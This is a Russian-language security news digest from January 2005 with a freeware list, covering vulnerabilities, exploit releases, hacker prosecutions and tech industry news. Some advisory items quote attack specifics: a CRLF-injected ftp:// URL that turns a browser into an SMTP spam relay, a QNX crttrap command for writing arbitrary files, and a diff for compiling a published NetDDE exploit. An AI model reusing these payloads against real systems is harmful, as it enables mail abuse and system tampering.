Rafel Ivgi сообщает об обнаружении уязвимости в популярном антивирусном ПО от Symantec - Norton AntiVirus 2004. Одна из динамических библиотек, инсталлируемых этим антивирусом, "ccErrDsp.dll" (инсталлируется в C:Program FilesCommon FilesSymantec Shared) регистрирует в системе COM (Component Object Model) - объект "CcErrDsp.ErrorDisplay.1". После того, как AntiVirus 2004 был использован, этот объект может быть создан как локально, так и удалённо (например, при помощи такой конструкции - Set symkiller = CreateObject("CcErrDsp.ErrorDisplay.1" )). При исследовании этого объекта Rafel обнаружил уязвимость в параметре "sProduct" функции "DisplayError" этого объекта. Задав большое значение этого параметра (например, передав строку вида 'A'>521950), можно вызвать переполнение буфера в стеке. Автор приводит пример кода, который, будучи выполнен при посещении определённой Вэб-страницы, вызовет отказ в работе антивируса. Как сообщил представитель Symantec, в настоящее время компания исследует уязвимость и работает над исправлением.
Описание уязвимости

7/01/2005 10:11 Turion - новое имя мобильных процессоров AMD
Компания AMD объявила торговую марку, под которой отныне будет продвигать свои процессоры для легких ноутбуков. Итак, знакомьтесь: Turion. В целом, сама платформа теперь будет называться The AMD Turion 64 Mobile Technology, и будет нацелена, как сообщается в официальном сообщении, для рынка тонких и легких (thin and light) ноутбуков, в то время как для полноформатных портативуных ПК по-прежнему будут предлагаться процессоры AMD Mobile AMD Athlon 64. Как объясняют представители AMD, свежевыдуманное слово "turion" весьма созвучно с понятием вроде юного стебелька, однако в компании новое слово слышится как производное от "tour" (путешествие, странствие) с намеком на начало нового пути. Впрочем. в компании подчеркнули, что словарное толкование будет добавлено несколько позже, в рекламных проспектах. Ожидается, что первые ноутбуки с логотипом Turion появятся в продаже ближе к середине года. Пока что ни цен, ни моделей компанией не представлено. Честно говоря, если бы не сообщение Reuters, про новый бренд и вовсе бы ничего не узнать, потому как официально про этот бренд на сайте AMD также ни слова. Turion... звучит, по крайней мере, не хуже чем Centrino, хотя, AMD с ее 9% рынка ноутбуков пока что тягаться с Intel весьма нелегко. Сколь удачной окажется новая марка - покажет лишь время.
Mobile-Review

7/01/2005 09:44 Создатель червя "Sasser" ответит в суде
В прошлом году он запугал миллионы интернет-пользователей по всему миру - в этом году ему самому нужно бояться: изобретатель интернет-червя "Sasser", 18-летний школьник из маленького села Waffensen в Нижней Саксонии, предстанет перед судом предположительно этой весной. Он обвиняется в "компьютерном саботаже и изменении данных" (всего 170 пунктов). В начале мая 2004 "Sasser" распространился с невероятной скоростью. Только за первые майские выходные он заразил более 100 000 компьютеров. Он использовал уязвимость в ОС Windows XP и 2000 и выводил компьютеры из строя. Прокуратура насчитала убытков на сумму 130.000 евро в одной только Германии. А по всему миру цифра составила более 1 миллиона евро.
SecurityLab

7/01/2005 09:29 Билл Гейтс о браузере Firefox
В своем недавнем интервью Билл Гейтс (Bill Gates) затронул тему популярного в последнее время web-браузера Firefox - главного современного конкурента Internet Explorer от Microsoft: "... Когда люди говорят, что Firefox был закачан на пользовательские системы, это, несомненно, правда, но IE тоже остается установленным на этих системах. Firefox нов, и люди с ним знакомятся. Возникает большой процентный показатель людей, которые пробуют его, ведь скачать программу очень просто."
Nixp.Ru

7/01/2005 09:02 Гейтс открыл выставку новейшей электроники
В Лас-Вегасе открылась ежегодная выставка потребительской электроники Consumer Electronics Show, на которой будут представлены новые телевизоры, игровые приставки, плоские экраны, а также технологии хранения и воспроизведения цифрового видео и аудио. Всего посетители выставки смогут увидеть около 50 тысяч новинок, сообщает BBC News. Глава компании Microsoft Билл Гейтс, выступая на открытии выставки, объявил о наступлении эпохи "максимального творчества". По его словам, усилия Microsoft по объединению компьютера с масс-медиа и средствами связи начинают окупаться. Гейтс отметил рост популярности новой платформы Windows XP Media Center, которая подключается к телевизору и позволяет смотреть фильмы, слушать музыку и просматривать фотографии с компьютера с помощью дистанционного управления. Как сообщил глава Microsoft, в 2004 году продажи Media Center возросли более, чем вдвое, и достигли полутора миллионов копий. На выставке Гейтс неожиданно обошел тему разработки новой модификации игровой приставки Xbox. Гейтс заявил лишь, что Xbox по качеству изображения будет сравнима с телевизором высокого разрешения.
Lenta.Ru

6/01/2005 12:55 VisiFone: VoIP добирается до домашних телефонов
В рамках выставки CES 2005 компании Texas Instruments и Viseon объявили о совместной разработке так называемого Digital Home Telephone, то есть, домашнего цифрового телефона VisiFone, основной особенностью которого можно считать поддержку интернет-телефонии - Voice over Internet Protocol (VoIP). Предполагается, что с помощью VisiFone можно будет осуществлять VoIP звонки, в том числе, в режиме видеотелефона. В основе новинки - разработанный в TI специальный интегрированный VoIP-процессор TNETV1050 на базе DSP-ядра TMS320DM64x. Пока-что VisiFone демонстрируется, если не ошибаюсь, всего лишь в виде образца. Однако уже объявлено о том, что VisiFone будет первоначально предлагаться провайдером Vonage на территории США.
Mobile-Review

6/01/2005 11:56 Бесконтрольный доступ к интернету мешает воспитательной и идеологической работе
Такое мнение выразила заместитель министра образования Беларуси Татьяна Ковалева на последней коллегии Министерства образования прошлого года. Чиновницу беспокоит тот факт, что молодежь практически не читает общеполитических газет и периодики, отдавая предпочтение сугубо профессиональным изданиям и интернету, сообщает газета "Рэспублiка". На взгляд Т.Ковалевой, бесконтрольный доступ к интернету явно не идет на пользу воспитательной и идеологической работе. Если в вузах можно проконтролировать общение студентов со всемирной паутиной, то в общежитиях, где владельцами компьютерных клубов являются коммерческие структуры, сделать это достаточно сложно. Поэтому, по мнению замминистра, правильнее было бы заменить коммерсантов на образовательных провайдеров. Продолжим рассуждения пользуясь логикой госпожи Ковалевой и предположим, что контроль за интернет-пользователями в жилых помещениях можно возложить на ЖЭСы, а в больницах и на транспорте на Министерство здравоохранения и Министерство транспорта соответственно.
SecurityLab

6/01/2005 11:21 Хактивизм – глобализация в Интернете
В настоящее время практически любой политический конфликт, затрагивающий интересы нескольких стран или непримиримо настроенных друг к другу политических сил, порождает всплеск активности хакеров. В сентябре 2001 года американские хакеры устроили настоящую войну против арабского Интернета: на следующий день после терактов было совершено огромное количество компьютерных атак на серверы провайдеров и крупные информационные сайты Пакистана, Палестины, Саудовской Аравии и других арабских стран. Наиболее удачной и известной антитеррористической акцией российских хакеров был взлом в августе 2001 года сайта Taleban.Com – на главной странице сайта взломщик написал проклятия не только в адрес самого движения "Талибан", но и в адрес всех наиболее известных чеченских полевых командиров. Настоящий киберджихад за Кашмир ведут друг против друга хакеры Пакистана и Индии. Имеет место и еще один киберконфликт – между хакерами материкового Китая и Тайваня. В киберпространстве постепенно сложилось целое движение, аналогичное движению антиглобалистов в офлайне. Хакеры-антиглобалисты предпочитают атаковать сайты либо крупных транснациональных компаний, либо правительственных структур, в первую очередь Пентагона. Свою лепту вносят и идеологически подкованные хакеры. В отличие от своих криминально либо вандалистски настроенных коллег эти компьютерные асы (например, движение «Хактивист») свою деятельность ведут в виде диверсий против транснациональных компаний. Это может быть взлом официальных сайтов компаний, размещение на них антиглобалистской пропаганды. Так, во время одного из форумов в Давосе были легализованы номера кредитных карточек всех его участников, включая Билла Клинтона и Билла Гейтса (последнего, несмотря на его широкую благотворительную кампанию, хакеры-антиглобалисты не любят и всячески стараются ему навредить).
Более подробно

6/01/2005 11:05 Хакеры на службе террористов
Арестованный итальянской полицией хакер подозревается в финансировании террористов анархистского толка. Андреа Куомо был арестован в среду в курортном городке Римини на побережье Адриатического моря. Как сообщило агентство Адн Кроносо, полиция давно следила за 38-летним компьютерным экспертом, подозревая, что он не просто консультирует различные банки в сфере информационных сетей, но при этом занимается хакерством с целью наживы. Подозрения подтвердились после того, как полицейский агент, выдав себя за потенциального клиента, убедился, что Куомо легко преодолевает защиту банковской электронной сети и без проблем перемещает деньги со счета на счет. Компьютерщика арестовали, и при обыске у него нашли доказательства того, что он давно и успешно "раздевал" некоторые кредитные учреждения, снимая деньги с чужих счетов, в том числе и через банкоматы. Но кроме доказательств "электронного мошенничества" полиция обнаружила в доме у Кумомо и кое-что посерьезнее. А именно - химреактивы, которые используются для производства взрывчатых веществ и скачанные из Интернета "учебники" по производству бомб. Учитывая, что там же нашли и пропагандистскую литературу организаций "революционных анархистов", которые в последние годы "отметились" в различных районах страны серией терактов, полиция сейчас пытается выяснить, в какой мере арестованный хакер мог принимать участие в этой преступной деятельности, и не занимался ли он "электронными кражами" для ее финансирования.
РИА "Новости"

6/01/2005 10:57 Документ о примерах атаки SQL Injection
Stephen J Friedl, консультант по безопасности Tustin (Калифорния, США) написал довольно полезный и любопытный документ под названием "SQL Injection Attacks by Example", посвящённый, как следует из названия, описанию различных атак с применением технологии внедрения SQL.
Статья

6/01/2005 10:09 Cерия уязвимостей в IBM DB2
Английская компания NGSSoftware, периодически обнаруживающая уязвимости в различном ПО на сей раз сообщила о целом букете уязвимости в СУБД DB2 от IBM. Их насчитывается 9 штук (в различных компонентах и библиотеках этой СУБД). IBM, после сообщения об уязвимости, был выпущен патч (фикспак) для различных версий DB2 (v8.1 и v7.x). Как сообщает компания для проверки наличия уязвимостей в сервере DB2 ей была выпущена специальная утилита под названием NGSSQuirreL for DB2.
Подробности

6/01/2005 09:40 Сотрудник КГБ Белоруссии заплатил 1000 долларов за сводничество в Интернете
Сотрудник центрального аппарата КГБ Белоруссии был осужден за сводничество в сети Интернет. Об этом "Интерфаксу" в среду сообщил неназванный источник в правоохранительных органах страны. По его словам, лейтенант белорусской спецслужбы, который являлся сотрудником подразделения, занимающегося обеспечением информационной безопасности страны, прикрываясь служебным положением, предложил двум проституткам разместить в Сети рекламные объявления своих услуг. Как рассказали информагентству в правоохранительных органах Белоруссии, "получив согласие проституток, лейтенант разместил эти объявления на различных сайтах знакомств и порностраницах". Когда об этом стало известно, сотрудник КГБ был немедленно уволен со службы, а белорусский суд приговорил его к штрафу в размере 100 базовых величин - более 1000 долларов США.
"Интерфакс"

5/01/2005 22:07 Ожидается скорое появление червя, использующего уязвимость WINS
Всем системным администраторам, еще не успевшим залатать дыры в серверном ПО и на клиентских местах рекомендуется срочно обновиться. На этот раз софтверный гигант среагировал как никогда быстро, в рекордные сроки выпустив критическое обновление. Как сообщает zdnet.co.uk со ссылкой на SANS, зарегистрирована повышенная активность в исследовании данной уязвимости. Невовремя обновившиеся системы очень сильно рискуют.
Zdnet.co.uk

5/01/2005 21:37 Опубликован эксплоит MyBB SQL Injection (member.php)
Используя SQL-инъекцию в параметре uid файла member.php можно получить хэш пароля администратора, затем, отредактировав cookie, получить доступ к администраторской панели.
Подробности

5/01/2005 20:49 Множественные уязвимости в 3com 3CDaemon
3CDaemon - бесплатная популярная TFTP, FTP и Syslog программа для Win32 платформ оказалась подвержена отказу в обслуживании, переполнению буфера, неверной обработке имени пользователя и командной строки, раскрытию закрытой информации (локальный путь). Производитель извещен, реакции пока не последовало.
Подробности

4/01/2005 14:26 Apple представит новый офис — iWork '05
По сообщению Think Secret, на грядущей конференции Macworld Expo компания Apple представит свой новый офисный набор iWork '05. В программное обеспечение, получившее кодовое название «Sugar», войдет Keynote 2 и новое приложение Pages. Пока еще точно не известно, будет ли Pages только текстовым процессором или сможет работать и с электронными таблицами. Разговоры о iWork, позже названном iWorks, который призван стать наследником AppleWorks, впервые появились почти два года назад, но до сих пор пользователям работать приходилось с AppleWorks 6, представленным Стивом Джобсом (Steve Jobs) на конференции Macworld Expo в Сан-Франциско еще в далеком 2000 году.
Из требований, предъявляемых iWork '05, указывается процессор в 500 МГц и Mac OS X 10.3.6
Nixp.Ru

4/01/2005 13:27 Internet Explorer уже потерял 30% рынка браузеров
Под таким заглавием появилась статья на lockergnome.com заявление основывается на собственной статистике masternewmedia.org более 600,000 посетителей из 180 стран(10 web сайтов, 200000 уникальных пользователей, 500000 просмотров за месяц), Internet Explorer контролирует немногим более 70% рынка браузеров, когда только 12 месяцев назад у него было 91%. Разумеется, необходимо учитывать несколько факторов. Во-первых, насколько популярен сам сайт, чтобы на основании его строить среднестатические данные. Во-вторых, есть достаточно много ПО, которое позволяет изменять заголовок используемого типа браузера (как пример, та же Mozilla и Opera).
Подробности

4/01/2005 12:03 СПАМ - "Грязная дюжина 2004"
Компания Sophos обнародовала "Грязную дюжину 2004" ("Dirty Dozen") – список стран, являющихся ведущими "производителями" спама – незапрашиваемой электронной почты. России в этом хит-параде нет, а первое место занимает Америка. Старший аналитик Sophos Грегг Масторас считает, что спамерское лидерство США объясняется "несовершенным законодательством и отсутствием интереса среди агентств, которые должны преследовать спамеров". Консультант фирмы Грэхем Клюли отметил, что за 40% мирового спама ответственны так называемые компьютеры-зомби. Это машины ни в чем не повинных пользователей, которые используются хакерами или вирусописателями для рассылки спама.
"Грязная дюжина 2004":
1. Соединенные Штаты – 42,11%
2. Южная Корея – 13,43%
3. Китай (включая Гонконг) – 8,44%
4. Канада – 5,71%
5. Бразилия – 3,34%
6. Япония – 2,57%
7. Франция – 1,37%
8. Испания – 1,18%
9. Великобритания – 1,13%
10. Германия – 1,03%
11. Тайвань – 1,00%
12. Мексика – 0,89%
Остальные страны – 17,8%
Crime-Research.Ru

4/01/2005 11:23 Обратный путь в каталогах при загруке файла в Microsoft Internet Explorer (directory traversal)
При загрузке файла с FTP-сервера не проверяется имя файла на наличие в нем "../", следовательно, злонамеренный FTP-сервер может изменить имя файла таким образом, что файл окажется в любом месте (например в "C:Documents and settingsAll UsersStartMenuProgramsStart"). Хотя Internet Explorer и показывает полностью имя файла с символами "../", может возникнуть ситуация, при которой пользователь не обратит внимания на это.
Источник

4/01/2005 10:46 Обход защиты во многих фаерволах (protection bypass)
Большинство персональных фаерволов не требуя пароля по умолчанию позволяют пользователю, либо программе производить управляющие действия - настройки фаерволла, включение/отключение правил и т.д. Программа, эмулируя нажатия кнопок и клики мышью может управлять фаерволлом без ведома пользователя. Фактически, любой троян, или червь, в котором реализована данная функция, может легко обойти персональный фаервол. Уязвимые продукты: ZoneAlarm / ZoneAlarm Pro (версия 4.5.538.001 и младше), Kerio (все версии), Agnitium Outpost Firewall (все версии), Kaspersky Anti-Hacker (все версии), Look 'n' Stop (все версии), Norton Personal Firewall (все версии), Panda Platinum Internet Security (все версии), Omniquad Personal Firewall (все версии). Производители были уведомлены 28.08.2004, но уязвимость исправлена только в ZoneAlarm / ZoneAlarm Pro (версии 5 и выше). Как пишет автор уязвимости (Ferruh Mavituna) уязвимости, исследованные им, подобны тем, о которых писали наши соотечественники ЗАРАЗА и offtoppic (им дано название shattering attacks), одко используются другие методы, названные автором - Sending Key Method and Mouse Control. Выпущены образцы эксплоитов на VBS и VB.NET.
Подробности
Подобные исследования проводил уважаемый 3APA3A из security.nnov.ru
Подробности

3/01/2005 13:46 Датчане придумали пиво в открытых исходниках
Как сообщает журнал Ingenioren, группа студентов из технического университета в Копенгагене (Дания) разработала пиво в открытых исходниках, получившее название Vores Ol. Напиток описывается студентами как «первое в мире open-source пиво». В его основу заложены классические традиции пивоварения, но с добавлением гуараны для получения естественного прилива энергии при употреблении. «Версия 1.0 — пиво средней крепкости (6%) с темным золотисто-красным цветом и оригинальным, но знакомым вкусом». Рецепт и сам сорт пива опубликован под лицензией Creative Commons License, что дает каждому право использовать его по назначению и создавать производные от оригинала сорта, но при условии публикации нового рецепта под той же лицензией со ссылкой на источник.
Nixp.Ru

3/01/2005 12:49 Книга "Knowing Knoppix"
Как сообщает linux.org.ru, 30 декабря вышла книга на английском (формат PDF 128 страниц) "Knowing Knoppix" для новичков Linux. Обсуждается процесс восстановления файлов на Windows-PC, работа с различными приложениями. Книгу начали писать во времена версии 3.3.
Скачать

3/01/2005 12:22 За шпионские программы будут штрафовать
С начала нового года в Калифорнии вступил в силу закон, определяющий ответственность для изготовителей программ, тайно собирающих информацию о том, что делают пользователи компьютеров у себя дома. Подобные программы, получившие название spyware, используются и коммерческими компаниями, и злоумышленниками. Этот закон предполагает суровые штрафы для разработчиков математического обеспечения, отсылающего своим авторам данные о работе компьютера, установленных программах, интернет-привычках и иногда даже паролях и банковских данных пользователя. Эксперты считают, что подобного рода слежка будет одной из главных угроз компьютерной безопасности в наступившем году. Недавнее исследование, проведенное компаниями Earthlink и Webroot обнаружило, что 9 из 10 компьютеров заражены такими программами. В среднем на каждом обследованном компьютере содержалось 28 программ spyware. Чем дальше, тем изощреннее становится подобный шпионаж. Spyware может маскировать себя под вполне легальные программы, менять конфигурацию, "зарываться" вглубь программных папок. Часто отследить и удалить такое обеспечение почти невозможно. Конгресс США обсуждает законы о борьбе со spyware уже давно, однако Калифорния решила действовать первой. Закон штата "О защите потребителя от Spyware" запрещает установку программ, которые контролируют деятельность удаленного компьютера. Он также обязывает компании и руководство интернет-сайтов сообщить, используют ли они какие-либо приложения, занимающиеся сбором информации.
BBC

3/01/2005 11:37 Россия обсуждает присоединение к европейской конвенции по киберпреступности
Федеральное агентство по печати и массовым коммуникациям провело в Москве конференцию, посвященную присоединению России к европейской конвенции по киберпреступности. В конференции приняли представители МВД и ФСБ России, Правительства Москвы, компании IBM и других организаций. Участники предлагают оценить риски, связанные с киберпреступностью и определить меры противодействия. Как сообщает Reuters в 2004 году наиболее часто в спамовых рассылках рекламировалось лекарство от артрита, поддельные удостоверения личности и информация фондовых рынков. Реклама порнографии уступила лидирующее положение. Провайдеры активно развивают фильтрацию спама, а спам порнографического содержания фильтры отсекают достаточно эффективно.
Crime-research.Ru

3/01/2005 10:29 Commodore продали американцам
Голландской компании Tulip, пообещавшей несколько лет назад вернуть к жизни торговую марку Commodore, удалось сбагрить эту слишком уж тяжелую ношу американской конторе Yeahronimo Media Ventures. Цена сделки, как пишет The Register, составила всего 24 миллиона евро. Любопытно, что всего полгода назад Tulip начала поставки свежей модели C64 Direct-to-TV, уповая в своих планах на шестимиллионную базу "лояльных" поклонников торговой марки Commodore. Компьютер, внешне напоминающий обычный джойстик с встроенным эмулятором CBM64, должен был стать первой ласточкой "в целой серии развлекательных продуктов, использующих имя и эмблему Commodore". Возможно, что генеалогическое древо почтенного лейбла еще действительно сможет дать пару-тройку отростков, но уже ясно, что произойдет это уже без участия Tulip.
Internet.Ru

2/01/2005 16:41 Возможность рассылки спама с использованием браузера
Как сообщается на форуме Forum.Protocols.ru, по сообщению Beyond Security браузеры Internet Explorer v6 SP1 и Konqueror v3.2, поддерживающие функции FTP-клиента, могут использоваться злоумышленниками для рассылки спама при посещении пользователями сайтов со специально сформированными URL. Браузер Mozilla Firefox v1.0 такой уязвимости не имеет. Уязвимые браузеры принимают в URL коды %0a и %0d (CRLF). В URL для FTP эти коды служат для указания имени пользователя и пароля. Благодаря некоторому сходству в работе протоколов FTP и SMTP, данная особенность браузеров может использоваться для отправки сообщений по электронной почте. Приведенная ниже ссылка - http://dsbl.org/testingground/IE-FTP-SMTP-link/ показывает пример использования этой особенности браузеров. Если после перехода по этой ссылке, вы посмотрите код страницы, то увидите строку URL
Код:
ftp://foo%0d%0aHELO%20mail%0d%0a
MAIL%20FROM%3a<>%0d%0a
RCPT%20TO%3a<ian-example%40penguinhosting.net>%0d%0a
DATA%0d%0a
Subject%3a%20hacked%0d%0a
To%3a%20ian%40penguinhosting.net%0d%0a%0d%0a
hacked%0d%0a.%0d%0a:bar@mx.penguinhosting.net:25/
которая позволяет отправить сообщение по электронной почте.
Источник

2/01/2005 15:29 Уязвимость в QNX
Обнаружена уязвимость в QNX crttrap. Локальный атакующий может читать и записывать произвольные файлы на системе. Локальный пользователь может запустить crttrap с параметром '-c' и тегом 'trap' и записать файл в произвольную директорию. Пример: $ crttrap -c tmp/rfdslabs trap. Патча на данный момент не существует.
Описание

2/01/2005 14:08 Эксплоит уязвимости в Windows
Опубликован исходный код эксплоита уязвимости, обнаруженной в семействе ОС Windows в службе NetDDE и описанной в вышедшем бюллетене MS04-031. Код написан как для компиляции в win32, так и для Linux. Небольшое замечание - для компиляции в Linux Alberto Garcнa Hierro рекомендует добавить следующие 2 строки - выход после diff:
@@ -11,6 +11,9 @@
#include
#include
#include
+#include
+#define Sleep(x) sleep(x)
+#define closesocket(x) close(x)
#endif
Второй собеседник Steve Friedl, однако, рекомендует другой вариант использования функции sleep (ввиду их разной реализации в Windows и Linux) - define Sleep(x) sleep(((x)+500)/1000). Как пишет автор эксплоита, houseofdabus, работа эксплоита проверена в следующих ОС: Windows XP Professional SP0, Windows XP Professional SP1, Windows 2000 Professional SP2, Windows 2000 Professional SP3, Windows 2000 Professional SP4, Windows 2000 Advanced Server SP4.
Исходный код и описание

2/01/2005 12:56 Уязвимость в Mozilla
Maurycy Prodeus из польской команды iSEC Security Research сообщает об уязвимости в популярном браузере Mozilla. Как сообщает автор, уязвимость связана с некорректной обработкой ссылок формата NNTP (news://) в исходном коде файла nsNNTPProtocol.cpp. В результате можно софрмировать определённый URL, при обработке которого может возникнуть переполнение кучи, что позволит удалённому серверу выполнить произвольный код в системе клиента. Как пишет Maurycy, в версии 1.7.5 уязвимость устранена, однако присутствует в версиях до 1.7.3. Автором выпущен пример кода эксплоита.
Описание уязвимости

2/01/2005 11:17 Опубликован эксплоит Microsoft WINS Remote Code Execution
На сайте французской группы K-Otik был выложен исходник вышеозначенного эксплоита. В комментарии указывается, что данный эксплоит работает на всех W2k sp3/sp4.
Исходник

Программы дня за год:

18/08/2005 Command-line File Verify
Консольная утилита, предназначенная для проверки и создания .sfv, .csv, .crc, .md5(sfv-like), sfvmd5(sfv с использование md5 вместо crc32), md5sum, bsd md5, sha1sum и .torrent файлов, основное предназначение которых, проверить корректность сохраненных данных. Данная программа написана на Python, что позволяет ей работать на различных платформах, таких как Linux, FreeBSD, OpenBSD, NetBSD, Solaris, MacOSX и MS Windows. Поддерживается рекурсивная функция обработки файлов в каталогах.
ОС: Cross-platform
Тип программы: Файловые утилиты

10/04/2005 Directory Lister
Программа позволяет создавать расширенные листинги заданных каталогов жесткого диска и съемных носителей. Данная утилита имеет большое разнообразие настроек по информации, отображаемой в листинге, результат обработки может быть сохранен в HTML, TXT или CSV формате. Некоторые возможности программы:
+ работа из командной строки;
+ сохранение/загрузка профиля настроек;
+ генерация листинга для каждого каталога в отдельности;
+ поддержка масок обрабатываемых файлов;
+ характеристики, которые могут быть отображены в листинге: название каталога/подкаталога, размер файла/директории, дата и время создания, аттрибуты, полный путь к файлу, контрольная сумма CRC32...;
+ сортировка файлов по заданному принципу.
ОС: All Win
Тип программы: Файловые утилиты

8/03/2005 musiCutter
Небольшая, но очень полезная утилита, предназначенная для работы с музыкальными файлами форматов mp3 и ogg. Основное предназначение программы является соединение нескольких музыкальных файлов в один трек и разбиение одного большого трека на несколько более мелких без перекодирования, по указанным временным промежуткам. Отличительной особенностью программы является: поддержка файлов любого размера, корректная работа с переменным битрейтом(VBR), возможность импорта точек обрыва из файлов таблицы данных CUE, XMCD и обычного текстового файла.
ОС: All Win
Тип программы: Прочее

12/02/2005 Packet Spy
Небольшая утилита с простым и понятным интерфейсом, предназначенная для просмотра содержимого входящих и исходящих IP/TCP/UDP пакетов. Программа обладает рядом простейших фильтров по IP адресу и портам, кроме этого интересующая вас информация о пакетах данных может быть сохранена в лог-файл, для дальнейшего более подробного изучения.
ОС: Win 2k/XP
Тип программы: Мониторинг сети

11/02/2005 SimpleCheck
Одна из лучших программ для управления почтой прямо на почтовом сервере. Поддерживается многопрофильная работа, что позволяет переносить профили на сменных носителях не изменяя настроек программы. Программа имеет функцию автоматического сбора почта через заданный интервал времени, при этом этот интервал может быть задан различным для каждого из почтовых ящиков. SimpleCheck обладает расширенной системой оповещения о приходе новой почты, с большим количеством обрабатываемых событий и разнообразием вариантов оповещения(от мигания иконки программы в трее до запуска почтового клиента). Еще одной особенностью программы является система фильтров. В программе существует разделение на две группы фильтров, т.е. фильтры, применяемые к конкретным почтовым ящикам и глобальный фильтр, применяемый ко всем почтовым ящикам. Фильтр позволяет анализировать практически все основные поля письма на соответствие их заданному условию и применять одно из выбранных правил. Письма, отмеченные для удаления как "спам" могут быть удалены прямо с почтового сервера без их получения или получены на компьютер и помещены в заранее заданную папку. Существует возможность просмотра сообщений прямо на сервере, как целиком, так и заданного числа строк, кроме этого программа обеспечивает возможность быстрого ответа на письма, что избавит вас от привязки к почтовому клиенту. Поддерживается работа через Socks 4/5 и автоматический дозвон до провайдера по заданному соединению.
ОС: All Win
Тип программы: Почта

10/02/2005 RSSOwl
Многофункциональный RSS аггрегатор, написанный на Java, что делает данный RSS-клиент многоплатформенным и позволяет его использовать на следующих системах: Windows, Mac
Mac OS X, Linux, Solaris. RSSOwl поддерживает обработку лент в RSS 0.91, 0.92 и 2.0, RDF 1.0, а также Atom Syndication Format 0.3 форматах. Отличительные особенности программы:
+ простой и удобный интерфейс;
+ гибкость настроек;
+ возможность импорта закладок, используя OPML формат;
+ применение правил к элементам закладок, таких как: "обновлять через заданный интервал времени", "открытие при запуске" или "перегрузить при запуске";
+ формирование подписки на несколько новостных лент, для удаленного ее использования;
+ внутренней браузер позволяет обрабатывать HTML форматирование;
+ экспортирование отдельных новостей в PDF, RTF или HTML форматы;
+ встроенная система поиска по загруженным новостным лентам с возможностью подсветки найденных элементов;
+ поддержка рейтинговой системы AmphetaRate для некоторых блогов;
+ встроенный feedvalidator, для проверки валидности сформированной новостной ленты;
+ поддержка авторизации, используя "Base authentication";
+ многоязыковая поддержка, более чем 25 языков, включая Русский.
ОС: Cross-platform
Тип программы: RSS

8/02/2005 CipherWall Self-Decryptor
Программа для создания саморасшифровывающихся архивов и безвозвратного удаления данных. Принцип работы программы: пользовательские данные сжимаются, а затем шифруются ключом, который генерируется из пароль-фразы и/или ключевого файла. К созданному архиву добавляется исполняемый модуль, что делает его автономным. Для расшифровки и распаковки такого архива не надо иметь аналогичного программного обеспечения! Надо лишь знать пароль-фразу и/или иметь ключевой файл.
Основные возможности и особенности программы:
+ высокий регулируемый уровень сжатия данных алгоритмом Deflate;
+ возможность задавать для каждого файла или каталога в архиве свой уровень сжатия;
+ высокая степень защиты данных благодаря стойким алгоритмам шифрования с большой длинной секретного ключа (Blowfish с длинной ключа 448 бит в режиме CFB, RC4 с длинной ключа 512 бит, RC5 с длинной ключа 512 в режиме CFB);
+ поддержка архивов ограниченных в размере лишь возможностями файловой системы;
+ поддержка вложеных каталогов в архиве;
+ сохранение в архиве системной информации о файлах (атрибуты, дата и время создания и т.д.);
+ использование в качестве ключа одновременно пароль-фразы и ключевого файла;
+ использование в качестве ключа удаленных файлов (программа сама скачает файл по указанному URL);
+ использование модифицированного генератора псевдослучайных чисел ANSI X9.17 для генерации сеансовых векторов инициализации шифров;
+ использование алгоритма хеширования SHA-512 для создания ключа из пароль-фразы и ключевого файла;
+ проверка целостности данных с помощью алгоритма CRC32;
+ использование надежных алгоритмов безвозвратного удаления (DoD-5220.22-M, Gutman's) данных что делает практически невозможным их восстановление.
ОС: All Win
Тип программы: Криптография

6/02/2005 X-Ray Mail Assistant
Многофункциональный обработчик почтовых сообщений, позволяющий фильтровать, добавлять, изменять заголовки исходящих/входящих почтовых сообщений. X-Ray Mail Assistant работает как локальный POP/SMTP прокси-сервер, что и позволяет производить анализ и работу с полями заголовков писем. Кроме этого, программа позволяет сохранять заголовки выбранных сообщений в текстовый файл, или наоборот, подставлять заголовки из заданного текстового файла. Благодаря гибкости настроек возможно создание заголовков динамического содержания. Поддерживается сохранение настроек в профили и переключение между созданными профилями во время работы программы.
ОС: All Win
Тип программы: Почта

4/02/2005 R-Firewall
Эффективное и очень легкое в настройке средство обеспечения безопасности вашего пребывания в Интернете и/или в локальной сети. Благодаря данному firewall'у вы легко сможете противостоять различного рода хакерским атакам, таким как: вирусы, трояны, бэкдуры, spyware и многое другое.
Кроме стандартных средств ограничения действий конкретных сетевых приложений, этот firewall позволяет блокировать опасный или нежелательный контент веб-страниц, например баннеры, а также осуществляет блокировку опасных элементов сообщений электронной почты, таких как скрипты и присоединенные к письмам файлы.
Поддержка нескольких профилей позволяет легко переключаться между различными настройками безопасности для различных сетей, эта функция может быть полезна тем, кто использует несколько Интернет-провайдеров или будет использовать этот firewall на ноутбуке.
ОС: All Win
Тип программы: Firewall

3/02/2005 Email Forwarding Server
Программа, обеспечивающая согласование локального почтового сервера с Интернет сервером почты. Основная задача программы сбор почты с одного почтового ящика вашего ISP и обеспечение шлюза и распределения сообщений для вашего локального почтового сервера (например: MS Exchange, EMWAC IMS). Особенности программы:
+ простой интерфейс, во время работы программа находится в системном трее;
+ поддержка неограниченного количества пользователей;
+ возможность создания псевдонимов для аккаунтов;
+ составление подробного лога работы программы;
+ автоматический сбор почты с почтового сервера ISP с заданным интервалом времени;
+ возможность создавать и поддерживать e-mail адреса вашего домена;
+ и прочее.
ОС: All Win
Тип программы: Почта

2/02/2005 HDDlife
Утилита, котрая через заданный интервал времени проверяет параметры состояния, устанволенных в вашу систему жестких дисков. Для анализа состояния используется информация, получаемая из S.M.A.R.T., которая сравнивается с эталонным состоянием нового диска. Во время работы программа создает для каждого из дисков иконку в системном трее и в заданном виде отображает там информацию о температуре жесткого диска, а также в процентном представлении состояние и производительность жесткого диска. Использование данной программы позволит вовремя предупредить возможность возникновения сбоев в работе жесткого диска и осуществлять постоянный контроль за его состоянием.
ОС: Win 2k/XP
Тип программы: Дисковые утилиты

1/02/2005 MiniApache
Веб-сервер, представляющий из себя "обрезанную" версию популярного веб-сервера Apache. Данный веб-сервер сочетает в себе быстроту и надежность всем известного Apache и при этом имеет очень маленький размер дистрибутива, что делает его идеальным выбором при необходимости быстрой организации и поддержки небольших веб-проектов. Кроме обычной поставки данного веб-сервера существует еще и версия, содержащая обработчик PHP и SSL. Размер дистрибутива с PHP составлет около 900Кб, а без него 300Кб.
ОС: Win NT/2k/XP
Тип программы: HTTP

31/01/2005 eMailer
Программа для рассылки писем, существует возможность отправки сообщения как одному отдельному адресату, так и группе адресатов. Программа имеет встроенный SMTP сервер. Особенности программы:
+ возможность указать любой обратный адрес;
+ отправка сообщений с вложенным файлом, поддержка системы drag&drop;
